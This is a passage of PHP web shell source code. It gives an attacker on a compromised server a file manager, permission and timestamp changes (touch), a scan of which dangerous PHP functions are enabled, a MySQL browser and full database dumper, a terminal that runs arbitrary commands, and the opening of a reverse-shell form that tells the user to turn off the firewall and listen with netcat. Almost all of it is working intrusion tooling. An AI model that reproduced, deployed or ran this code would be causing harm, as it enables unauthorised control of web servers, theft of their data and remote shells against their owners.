if ($_REQUEST['a'] == 'c') {
printf("<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='octal' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Chmod' name='chmod'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>", substr(decoct(fileperms($file)), 2), $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("chmod", $_REQUEST)) {
$octal = octdec($_REQUEST['octal']);
if (!chmod(trim($file), $octal)) {
$_SESSION['status'] = 'Whoops, something went wrong...';
} else {
$_SESSION['status'] = 'Chmod file with success';
}
header("location:php_self?a=c&r=" . urle($file));
}
}
if ($_REQUEST['a'] == 'cwn') {
$own = '';
if (function_exists('posix_getpwuid')) {
$user = posix_getpwuid(fileowner($x));
$own = $user['name'];
}
printf("<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='own' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Chown' name='chown'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>", $own, $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("chown", $_REQUEST)) {
$own = $_REQUEST['own'];
if (!chown(trim($file), $own)) {
$_SESSION['status'] = 'Whoops, something went wrong...';
} else {
$_SESSION['status'] = 'Chown file with success';
}
header("location:php_self?a=cwn&r=" . urle($file));
}
}
if ($_REQUEST['a'] == 'cgp') {
$grp = '';
if (function_exists('posix_getgrgid')) {
$group = posix_getgrgid(filegroup($x));
$grp = $group['name'];
}
printf("<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='grp' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Chgrp' name='chgrp'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>", $grp, $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("chgrp", $_REQUEST)) {
$grp = $_REQUEST['grp'];
if (!chgrp(trim($file), $grp)) {
$_SESSION['status'] = 'Whoops, something went wrong...';
} else {
$_SESSION['status'] = 'Chgrp file with success';
}
header("location:php_self?a=cgp&r=" . urle($file));
}
}
if ($_REQUEST['a'] == 't') {
printf("<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='time' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Touch' name='touch'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>", GetFileTime($file, "modify"), $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("touch", $_REQUEST)) {
$time = $_REQUEST['time'];
if (!touch(trim($file), strtotime($time))) {
$_SESSION['status'] = 'Whoops, something went wrong...';
} else {
$_SESSION['status'] = 'Touched file with success';
}
header("location:php_self?a=t&r=" . urle($file));
}
}
if ($_REQUEST['a'] == 'v') {
printf("<div class='menu'>\r\n\t\t\t\t\t<ul>\r\n\t\t\t\t\t\t<li><a href='?a=v&r=%s'>Source</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=f&r=%s'>iFrame</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=i&r=%s'>Image</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=v&r=%s'>Video</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=a&r=%s'>Audio</a></li>\r\n\t\t\t\t\t</ul>\r\n\t\t\t\t</div>", urle($file), urle($file), urle($file), urle($file), urle($file));
if (is_readable($file)) {
if (any("w", $_REQUEST)) {
$url = GetUrlFromPath($file);
$type = pathinfo($url)['extension'];
if ($_REQUEST['w'] == 'f') {
printf("<center><iframe src='%s' width='100%%' height='325' frameBorder='0'>Suck</iframe><a href='%s' target='_blank'>--> New Tab <--</a></center>", $url, $url);
}
if ($_REQUEST['w'] == 'i') {
printf("<center><img src='%s' alt=' Not Image'/></center>", $url);
}
if ($_REQUEST['w'] == 'v') {
printf("<center><video width='640' height='320' controls><source src='%s' type='video/%s'>Suck</video></center>", $url, $type);
}
if ($_REQUEST['w'] == 'a') {
printf("<center><audio controls><source src='%s' type='audio/%s'>Suck</audio></center>", $url, $type);
}
} else {
if (filesize($file) > 5242880) {
printf("Lazy to Read more than 5MB Files");
} else {
$code = highlight_file($file, true);
printf("<div class='highlight'>%s</div>", $code);
}
}
}
}
if ($_REQUEST['a'] == 'h') {
$c = file_get_contents($file);
$n = 0;
$h = array('00000000<br>', '', '');
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2] .= ' ';
break;
case 9:
$h[2] .= ' ';
break;
case 10:
$h[2] .= ' ';
break;
case 13:
$h[2] .= ' ';
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf('%08X', $i + 1) . '<br>';
}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
printf("\r\n\t\t\t\t<div id='hexdump'>\r\n\t\t\t\t\t<table class='hexdump'>\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<td><pre>%s</pre></td>\r\n\t\t\t\t\t\t\t<td><pre>%s</pre></td>\r\n\t\t\t\t\t\t\t<td><pre>%s</pre></td>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>", $h[0], $h[1], htmlspecialchars($h[2]));
}
if ($_REQUEST['a'] == 'cp' || $_REQUEST['a'] == 'mv') {
printf("<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='file-dest' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='%s' name='submit'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>", $file, $_REQUEST['a'] == 'cp' ? 'Copy' : 'Move', $status);
if (any("status", $_SESSION)) {
unset($_SESSION['status']);
}
if (any("submit", $_REQUEST)) {
$source = $file;
$dest = $_REQUEST['file-dest'];
if (!file_exists($dest)) {
if ($_REQUEST['a'] == 'cp') {
if (!copy(trim($source), trim($dest))) {
$_SESSION['status'] = 'Whoops, cannot copying...';
} else {
$_SESSION['status'] = "Copy file with success <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
}
} elseif ($_REQUEST['a'] == 'mv') {
if (!copy(trim($source), trim($dest))) {
$_SESSION['status'] = 'Whoops, cannot moving...';
} else {
if (Remove($source)) {
$_SESSION['status'] = "Move file with success";
$file = $dest;
} else {
$_SESSION['status'] = 'Whoops, just copying...';
}
}
}
} else {
$_SESSION['status'] = "Whoops, File was Exists <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
}
if ($_REQUEST['a'] == 'cp') {
header("location:php_self?a=cp&r=" . urle($file));
} elseif ($_REQUEST['a'] == 'mv') {
header("location:php_self?a=mv&r=" . urle($file));
}
}
}
if ($_REQUEST['a'] == 'd') {
if (file_exists($file)) {
header('Cache-Control:must-revalidate,post-check=0,pre-check=0');
header('Content-Disposition:attachment;filename=' . basename($file));
header('Content-Type:application/octet-stream');
header('Content-Description:File Transfer');
header('Content-Transfer-Encoding:binary');
header('Content-Length:' . filesize($file));
header('Pragma:public');
header('Expires:0');
ob_clean();
readfile($file);
exit;
}
}
if ($_REQUEST['a'] == 'x') {
if (file_exists($file)) {
if (Remove($file)) {
header("location:" . $back);
}
}
print "<font class=\"off\">Cannot Delete</font>";
}
} else {
print "<font class=\"off\">File Not Found</font>";
}
}
if (any("x", $_REQUEST)) {
if ($_REQUEST['x'] == "logout") {
session_destroy();
session_regenerate_id();
header("location:php_self");
}
if ($_REQUEST['x'] == "secure") {
$disable_functions = array_filter(array_map('trim', explode(',', ini_get("disable_functions"))));
$security = array('_xyec', 'allow_url_fopen', 'allow_url_include', 'apache_child_terminate', 'apache_get_modules', 'apache_getenv', 'apache_note', 'apache_setenv', 'base64_decode', 'chdir', 'chgrp', 'chmod', 'chown', 'curl_exec', 'curl_multi_exec', 'dbase_open', 'dbmopen', 'define_syslog_variables', 'disk_free_space', 'disk_total_space', 'diskfreespace', 'dl', 'dlopen', 'escapeshellarg', 'escapeshellcmd', 'eval', 'exec', 'extract', 'filepro', 'filepro_retrieve', 'filepro_rowcount', 'fopen_with_path', 'fp', 'fput', 'fputs', 'ftp_connect', 'ftp_exec', 'ftp_get', 'ftp_login', 'ftp_nb_fput', 'ftp_put', 'ftp_raw', 'ftp_rawlist', 'geoip_open', 'get_cfg_var', 'get_current_user', 'get_num_redirects', 'getcwd', 'getenv', 'getlastmo', 'getmygid', 'getmyinode', 'getmypid', 'getmyuid', 'getrusage', 'gzinflate', 'gzuncompress', 'highlight_file', 'hpAds_xmlrpcEncode', 'ini_alter', 'ini_get_all', 'ini_restore', 'ini_set', 'inject_code', 'leak', 'link', 'listen', 'mainwork', 'mb_send_mail', 'mkdir', 'mkfifo', 'move_uploaded_file', 'mysql_list_dbs', 'mysql_pconnect', 'openlog', 'parse_ini_file', 'passthru', 'pcntl_alarm', 'pcntl_exec', 'pcntl_fork', 'pcntl_get_last_error', 'pcntl_getpriority', 'pcntl_setpriority', 'pcntl_signal', 'pcntl_signal_dispatch', 'pcntl_sigprocmask', 'pcntl_sigtimedwait', 'pcntl_sigwaitinfo', 'pcntl_strerrorp', 'pcntl_wait', 'pcntl_waitpid', 'pcntl_wexitstatus', 'pcntl_wifexited', 'pcntl_wifsignaled', 'pcntl_wifstopped', 'pcntl_wstopsig', 'pcntl_wtermsig', 'pfsockopen', 'phpAds_XmlRpc', 'phpAds_remoteInfo', 'phpAds_xmlrpcDecode', 'phpAds_xmlrpcEncode', 'php_uname', 'phpinfo', 'popen', 'posix_getgrgid', 'posix_getlogin', 'posix_getpwuid', 'posix_kill', 'posix_mkfifo', 'posix_setpgid', 'posix_setsid', 'posix_setuid', 'posix_ttyname', 'posix_uname', 'posixc', 'proc_close', 'proc_get_stats', 'proc_get_status', 'proc_nice', 'proc_open', 'proc_terminate', 'ps_aux', 'putenv', 'readlink', 'rename', 'rmdir', 'runkit_function_rename', 'set_time_limit', 'sh2_exec', 'shell_exec', 'show_source', 'sleep', 'socket_accept', 'socket_bind', 'socket_clear_error', 'socket_close', 'socket_connect', 'socket_create', 'socket_create_listen', 'socket_create_pair', 'socket_get_option', 'socket_getpeername', 'socket_getsockname', 'socket_last_error', 'socket_listen', 'socket_read', 'socket_recv', 'socket_recvfrom', 'socket_select', 'socket_send', 'socket_sendto', 'socket_set_block', 'socket_set_nonblock', 'socket_set_option', 'socket_shutdown', 'socket_strerror', 'socket_write', 'str_rot13', 'stream_select', 'stream_socket_server', 'symlink', 'syslog', 'system', 'tp_exec', 'virtual', 'xmlrpc_entity_decode');
sort($security);
$fucks = array_unique(array_merge($disable_functions, $security));
$table = "";
$enable = 0;
$disable = 0;
$die = array();
$ready = array();
$off = array();
$total = count($fucks);
foreach ($fucks as $fuck) {
$table .= "<tr><td></td><td>{$fuck}</td><td>";
if (in_array($fuck, $disable_functions)) {
$table .= "<center><font color=red>DIE</font></center>";
$die[] = $fuck;
$disable++;
} else {
if (function_exists($fuck) || is_callable($fuck)) {
$table .= "<center><font color=green>READY</font></center>";
$ready[] = $fuck;
$enable++;
} else {
$table .= "<center><font color=orange>OFF</font></center>";
$off[] = $fuck;
$disable++;
}
}
$table .= "</td></tr>";
}
$risk = $enable / $total * 100;
$secure = $disable / $total * 100;
printf("<h2 style='text-align:center'>Sec. Info v2.0.%s</h2><br>\r\n\t\t\t<h4 style='text-align:center;color:var(--txt-color)'>Risks Rate <font color=red>[%s%%]</font> | Secure Rate <font color=green>[%s%%]</font></h4><br><br>\r\n\t\t\t<div class='auto-number'>\r\n\t\t\t\t<table class='table sortable'>\r\n\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<th class='sorttable_nosort' width='15'>No.</th>\r\n\t\t\t\t\t\t\t<th>Disable Function</th>\r\n\t\t\t\t\t\t\t<th>Status</th>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t</thead>\r\n\t\t\t\t\t<tbody>\r\n\t\t\t\t\t\t%s\r\n\t\t\t\t\t</tbody>\r\n\t\t\t\t</table>\r\n\t\t\t\t<fieldset style='margin-bottom:15px'>\r\n\t\t\t\t\t<legend>Ready List</legend>\r\n\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t</fieldset>\r\n\t\t\t\t<div class='divide'>\r\n\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t<fieldset style='margin-bottom:15px'>\r\n\t\t\t\t\t\t\t<legend>Off List</legend>\r\n\t\t\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t\t<legend>Die List</legend>\r\n\t\t\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t</div>\r\n\t\t\t</div>", $total, round($risk, 2), round($secure, 2), $table, implode($ready, ', '), implode($off, ', '), implode($die, ', '));
}
if ($_REQUEST['x'] == "info") {
printf("<div id='php-configuration'>\r\n\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t<select id='php-config'>\r\n\t\t\t\t\t<option value='4'>INFO_CONFIGURATION</option>\r\n\t\t\t\t\t<option value='16' selected>INFO_ENVIRONMENT</option>\r\n\t\t\t\t\t<option value='32'>INFO_VARIABLES</option>\r\n\t\t\t\t\t<option value='8'>INFO_MODULES</option>\r\n\t\t\t\t\t<option value='1'>INFO_GENERAL</option>\r\n\t\t\t\t\t<option value='2'>INFO_CREDITS</option>\r\n\t\t\t\t\t<option value='64'>INFO_LICENSE</option>\r\n\t\t\t\t\t<option value='-1'>INFO_ALL</option>\r\n\t\t\t\t</select>\r\n\t\t\t\t<input type='submit' onclick=\"return getAjax(true,'php-info','POST','?x=info&xa=envirolment&config='+document.getElementById('php-config').value);\"/><br>\r\n\t\t\t</form>\r\n\t\t</div>\r\n\t\t<div id='php-info' class='result'></div>");
$cores = array('PHP_VERSION', 'PHP_MAJOR_VERSION', 'PHP_MINOR_VERSION', 'PHP_RELEASE_VERSION', 'PHP_VERSION_ID', 'PHP_EXTRA_VERSION', 'PHP_ZTS', 'PHP_DEBUG', 'PHP_MAXPATHLEN', 'PHP_OS', 'PHP_OS_FAMILY', 'PHP_SAPI', 'PHP_EOL', 'PHP_INT_MAX', 'PHP_INT_MIN', 'PHP_INT_SIZE', 'PHP_FLOAT_DIG', 'PHP_FLOAT_EPSILON', 'PHP_FLOAT_MIN', 'PHP_FLOAT_MAX', 'DEFAULT_INCLUDE_PATH', 'PEAR_INSTALL_DIR', 'PEAR_EXTENSION_DIR', 'PHP_EXTENSION_DIR', 'PHP_PREFIX', 'PHP_BINDIR', 'PHP_BINARY', 'PHP_MANDIR', 'PHP_LIBDIR', 'PHP_DATADIR', 'PHP_SYSCONFDIR', 'PHP_LOCALSTATEDIR', 'PHP_CONFIG_FILE_PATH', 'PHP_CONFIG_FILE_SCAN_DIR', 'PHP_SHLIB_SUFFIX', 'PHP_FD_SETSIZE');
$table = "";
foreach ($cores as $core) {
$table .= "<tr><td>" . $core . "</td><td>" . @constant($core) . "</td></tr>";
}
printf("<h2>Core Predefined Constants</h2><br>\r\n\t\t\t\t<table class='table'>\r\n\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<th>Predefined Constants</th>\r\n\t\t\t\t\t\t\t<th>Value</th>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t</table>", $table);
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "envirolment") {
ob_clean();
phpinfo($_REQUEST['config']);
$phpinfo = ob_get_contents();
ob_end_clean();
$phpinfo = preg_replace('%^.*<body>(.*)</body>.*$%ms', '$1', $phpinfo);
printf("<div id='phpinfo'>%s</div>", $phpinfo);
exit;
}
}
if ($_REQUEST['x'] == "db") {
$connect = any("connect", $_SESSION) ? $_SESSION['connect'] : "";
$status = any("status", $_SESSION) ? $_SESSION['status'] : "";
$query = any("query", $_REQUEST) ? $_REQUEST['query'] : "show databases;";
if ($connect == true) {
$process = "";
$sql = mysqli_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['pass'], $_SESSION['dbas'], $_SESSION['port']);
/*
$result=mysql_list_processes($sql);
while($row=mysql_fetch_assoc($result))
{
$process.=sprintf("<tr>
<td>%s</td><td>%s</td><td>%s</td>
<td>%s</td><td>%s</td></tr>",
$row["Id"],$row["Host"],$row["db"],
$row["Command"],$row["Time"]);
}
mysql_free_result($result);
*/
printf("<div class='database-session'>\r\n\t\t\t\t\t\t<div class='database-query'>\r\n\t\t\t\t\t\t\t<form action='?x=db&xa=qry' method='post'>\r\n\t\t\t\t\t\t\t\t<label>MYSQL Query<hr></label><br>\r\n\t\t\t\t\t\t\t\t<label><i style='color:#222'>\r\n\t\t\t\t\t\t\t\tshow databases;<br>\r\n\t\t\t\t\t\t\t\tshow tables from {database};<br>\r\n\t\t\t\t\t\t\t\tshow columns from {database}.{table};<br>\r\n\t\t\t\t\t\t\t\tselect count(*) from {database}.{table};<br>\r\n\t\t\t\t\t\t\t\tselect * from {database}.{table}limit 0,10;</i></label>\r\n\t\t\t\t\t\t\t\t<textarea id='query' name='query'>%s</textarea><br>\r\n\t\t\t\t\t\t\t\t<input type='submit' name='disconnect' value='Disconnect'/>\r\n\t\t\t\t\t\t\t\t<input type='submit' value='Execute'/>\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='database-process'>\r\n\t\t\t\t\t\t\t<!-- div class='mysql-process-result'>\r\n\t\t\t\t\t\t\t\t<label>Database Process <a href='?x=db&xa=proc'>♻</a><hr></label>\r\n\t\t\t\t\t\t\t\t<table class='table table-bordered'>\r\n\t\t\t\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Id</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Host</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Database</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Command</th>\r\n\t\t\t\t\t\t\t\t\t\t\t<th>Time</th>\r\n\t\t\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t\t</div -->\r\n\t\t\t\t\t\t\t<div class='database-dump'>\r\n\t\t\t\t\t\t\t\t<label>Database Dump<hr></label>\r\n\t\t\t\t\t\t\t\t<form action='?x=db&xa=dmp' method='post'><br>\r\n\t\t\t\t\t\t\t\t\t<label>Database</label><input type='text' name='database' value=''/><br>\r\n\t\t\t\t\t\t\t\t\t<label>Output</label><input type='text' name='output' value='%s'/><br>\r\n\t\t\t\t\t\t\t\t\t<input type='submit' value='Dump' />\r\n\t\t\t\t\t\t\t\t\t<label>%s</label>\r\n\t\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='clr'></div>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t", $query, $process, $dir, $status);
} else {
printf("<div id='database'>\r\n\t\t\t\t\t<form action='?x=db&xa=db' method='post' class='new'><br>\r\n\t\t\t\t\t\t<label>Host</label><input type='text' name='host' value='localhost'/><br>\r\n\t\t\t\t\t\t<label>Port</label><input type='text' name='port' value='3306'/><br>\r\n\t\t\t\t\t\t<label>Username</label><input type='text' name='user' value='root'/><br>\r\n\t\t\t\t\t\t<label>Password</label><input type='text' name='pass' value=''/><br>\r\n\t\t\t\t\t\t<label>Database</label><input type='text' name='dbas' value=''/><br>\r\n\t\t\t\t\t\t<input type='submit' value='Connect'/>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>");
}
if (any("rs", $_REQUEST)) {
$_SESSION[$_REQUEST['rs']] = '';
}
if (any("cd", $_REQUEST)) {
$_SESSION['qdb'] = $_REQUEST['cd'];
}
if (any("ct", $_REQUEST)) {
$_SESSION['qtb'] = $_REQUEST['ct'];
}
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "db") {
$cn = mysqli_connect($_REQUEST['host'], $_REQUEST['user'], $_REQUEST['pass'], $_REQUEST['dbas'], $_REQUEST['port']);
$_SESSION['host'] = $_REQUEST['host'];
$_SESSION['port'] = $_REQUEST['port'];
$_SESSION['user'] = $_REQUEST['user'];
$_SESSION['pass'] = $_REQUEST['pass'];
$_SESSION['dbas'] = $_REQUEST['dbas'];
if ($cn) {
$_SESSION['connect'] = true;
header("location:php_self?x=db");
} else {
$_SESSION['connect'] = false;
printf("<b class='off'>Connection Failed</b>");
}
}
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "qry") {
$_SESSION['status'] = '';
$con = mysqli_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['pass'], $_SESSION['dbas'], $_SESSION['port']);
if (isset($_REQUEST['disconnect'])) {
mysqli_close($con);
unset($_SESSION['connect']);
unset($_SESSION['query']);
unset($_SESSION['host']);
unset($_SESSION['user']);
unset($_SESSION['pass']);
unset($_SESSION['dbas']);
unset($_SESSION['qdb']);
unset($_SESSION['qtb']);
header("location:php_self?x=db");
}
$sql = !empty($_REQUEST['query']) ? $_REQUEST['query'] : "show databases;";
$result = mysqli_query($con, $sql);
$data = array();
$name = array();
if ($result) {
while ($fieldinfo = mysqli_fetch_field($result)) {
$name[] = $fieldinfo->name;
}
$data[] = $name;
while ($row = mysqli_fetch_row($result)) {
$data[] = $row;
}
mysqli_free_result($result);
} else {
$data = false;
}
if ($data !== false) {
$sqdb = isset($_SESSION['qdb']) ? $_SESSION['qdb'] : '';
$sqtb = isset($_SESSION['qtb']) ? $_SESSION['qtb'] : '';
$bsdb = "<a href='?x=db&xa=qry&rs=qdb&query=show databases;'>Database</a>";
$bqdb = !empty($_SESSION['qdb']) ? "→\t<a href='?x=db&xa=qry&rs=qtb&query=show tables from {$sqdb};'>{$sqdb}</a>" : "";
$bqtb = !empty($_SESSION['qtb']) ? "→\t<a href='?x=db&xa=qry&query=show columns from {$sqdb}.{$sqtb};'>{$sqtb}</a>" : "";
printf("<div class='database=table'>\r\n\t\t\t\t\t\t<div class='database-breadcrumb'>%s %s %s</div>\r\n\t\t\t\t\t\t<div class='auto-number'>\r\n\t\t\t\t\t\t<table class='table sortable'>", $bsdb, $bqdb, $bqtb);
foreach ($data as $key => $val) {
if (is_array($val)) {
if ($key == 0) {
print "<tr><th class='sorttable_nosort'>☰</th>";
foreach ($val as $key2 => $val2) {
if (!is_array($val2)) {
print "<th>" . $val2 . "</th>";
}
}
print "</tr>";
} else {
print "<tr><td width='15'></td>";
foreach ($val as $key3 => $val3) {
if (!is_array($val3)) {
if (strpos($val2, 'Database') !== false) {
print "<td><a href='?x=db&xa=qry&cd={$val3}&query=show tables from {$val3};'>{$val3}</a></td>";
} elseif (strpos($val2, 'Tables') !== false) {
$val4 = substr($val2, strpos($val2, 'Tables_in_') + 10);
print "<td><a href='?x=db&xa=qry&cd={$val4}&ct={$val3}&query=select * from {$val4}.{$val3} limit 0,10;'>{$val3}</a></td>";
} else {
print "<td>{$val3}</td>";
}
}
}
print "</tr>";
}
}
}
print "</table></div></div>";
} else {
print "<span class=off>Query not Executed</span>";
}
}
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "dmp") {
$database = $_REQUEST['database'];
$output = $_REQUEST['output'];
if (!file_exists($output) && !empty($database)) {
$link = mysqli_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['pass'], null, $_SESSION['port']);
mysqli_set_charset($link, 'utf8');
mysqli_select_db($link, $database);
$tables = array();
$result = mysqli_query($link, 'SHOW TABLES');
while ($row = mysqli_fetch_row($result)) {
$tables[] = $row[0];
}
$return = "SET FOREIGN_KEY_CHECKS=0;\r\n";
$return = "SET FOREIGN_KEY_CHECKS=0;\r\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\r\n";
$return = "SET FOREIGN_KEY_CHECKS=0;\r\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\r\nSET AUTOCOMMIT=0;\r\n";
$return = "SET FOREIGN_KEY_CHECKS=0;\r\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\r\nSET AUTOCOMMIT=0;\r\nSTART TRANSACTION;\r\n";
foreach ($tables as $table) {
$result = mysqli_query($link, 'SELECT * FROM ' . $table);
$num_fields = mysqli_num_fields($result);
$num_rows = mysqli_num_rows($result);
$i_row = 0;
$row2 = mysqli_fetch_row(mysqli_query($link, 'SHOW CREATE TABLE ' . $table));
$return .= "\n\n" . $row2[1] . ";\n\n";
if ($num_rows !== 0) {
$row3 = @mysqli_fetch_fields($result);
$return .= 'INSERT INTO ' . $table . '( ';
foreach ($row3 as $th) {
$return .= '`' . $th->name . '`,';
}
$return = substr($return, 0, -2);
$return .= ' ) VALUES';
for ($i = 0; $i < $num_fields; $i++) {
while ($row = mysqli_fetch_row($result)) {
$return .= "\n(";
for ($j = 0; $j < $num_fields; $j++) {
$row[$j] = addslashes($row[$j]);
$row[$j] = preg_replace("#\n#", "\\n", $row[$j]);
if (isset($row[$j])) {
$return .= '"' . $row[$j] . '"';
} else {
$return .= '""';
}
if ($j < $num_fields - 1) {
$return .= ',';
}
}
if (++$i_row == $num_rows) {
$return .= ");";
} else {
$return .= "),";
}
}
}
}
$return .= "\n\n\n";
}
$return .= "SET FOREIGN_KEY_CHECKS=1;\r\n";
$return .= 'COMMIT;';
$output = pathinfo($otput)['extension'] == 'sql' ? $output : $output . '.sql';
$handle = fopen($output, 'w+');
fwrite($handle, $return);
fclose($handle);
$_SESSION['status'] = sprintf("Dump with success... <a href='?a=v&r=%s' target='_blank'>'%s'</a>", urle($output), basename($output));
} else {
$_SESSION['status'] = "<span class=off>Dump Error</span>";
}
header("location:php_self?x=db");
}
}
if ($_REQUEST['x'] == "terminal") {
printf("\r\n\t\t\t<div id='terminal'>\r\n\t\t\t\t<textarea id='prompt-terminal' class='cmd' cols='122' rows='20' readonly>%s</textarea>\r\n\t\t\t\t<form onsubmit='return false;'>\r\n\t\t\t\t\t<label id='curdir-terminal'>\$ %s:</label>\r\n\t\t\t\t\t<input type='text' id='terminal-input' autocomplete='off' onfocus=\"\" onkeydown=\"\r\n\t\t\t\t\t\tif(event.keyCode==13) \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\ttemp=this.value;\r\n\t\t\t\t\t\t\tthis.value='';\r\n\t\t\t\t\t\t\tgetAjax(true,'curdir-terminal','POST','?x=terminal&xa=terminals-curdir&cmd='+temp);\r\n\t\t\t\t\t\t\treturn getAjax(false,'prompt-terminal','POST','?x=terminal&xa=terminals&cmd='+temp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\" class='cmd' name=cmd cols=122 rows=2></input>\r\n\t\t\t\t</form>\r\n\t\t\t</div>", Execute('whoami'), $dir);
if (any("xa", $_REQUEST) && $_REQUEST['xa'] == "terminals") {
ob_clean();
$command = !empty($_REQUEST['cmd']) ? $_REQUEST['cmd'] : "whoami";
@chdir($dir);
$charset = 'UTF-8';
if (!Unix()) {
$charset = 'Windows-1251';
}
$ret = iconv($charset, 'UTF-8', Execute($command));
print $ret;
exit;
} elseif (any("xa", $_REQUEST) && $_REQUEST['xa'] == "terminals-curdir") {
ob_clean();
$command = !empty($_REQUEST['cmd']) ? $_REQUEST['cmd'] : "whoami";
if (preg_match('/cd (.*)/', $command, $dirx)) {
if ($dirx[1] == '..') {
$dir = substr($dir, 0, strrpos($dir, _));
if (strlen($dir) <= 2) {
$dir .= _;
}
} else {
if (is_dir($dirx[1])) {
$dir = realpath($dirx[1]);
}
}
}
$_SESSION['c'] = urle($dir);
print '$ ' . $dir . ':';
exit;
}
}
if ($_REQUEST['x'] == "connect") {
printf("<div id='connect'>\r\n\t\t\t\t<div class='connect-left'>\r\n\t\t\t\t\t<div class='Reverse-connect'>\r\n\t\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t\t<legend>Reverse Connect</legend>\r\n\t\t\t\t\t\t\t<form action='?x=connect&xa=reverse-connect' method='post' onsubmit=\"\r\n\t\t\t\t\t\t\t\treturn confirm('HOST will FUCKED ON ur PC or LAPTOP ?!\\nMake Sure ur FIREWALL OFF ?!\\nUSE NETCAT {nc -lvp ' + document.getElementById('reverse-port').value+'}\\n\\nTYPE \\'exit\\' or \\'quit\\' to TERMINATE')\">\r\n\t\t\t\t\t\t\t\t<label>Remote Ip</label><input type='text' name='reverse-ip' value='%s'/><br>\r\n\t\t\t\t\t\t\t\t<label>Remote Port</label><input type='text' id='reverse-port' name='reverse-port' value='1337'/><br>\r\n\t\t\t\t\t\t\t\t<label>Socket</label><select name='socket'>\r\n\t\t\t\t\t\t\t\t\t<option value='fsockopen'>fsockopen</option>\r\n\t\t\t\t\t\t\t\t\t<option value='socket_create'>socket_create</option>\r\n\t\t\t\t\t\t\t\t\t<option value='stream_socket_client'>stream_socket_client</option>\r\n\t\t\t\t\t\t\t\t</select><br>\r\n\t\t\t\t\t\t\t\t<input type='submit' value='Connect' />\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='connect-right'>\r\n\t\t\t\t\t<div class='status-connect'>\r\n\t\t\t\t\t\t<fieldset>\r\n 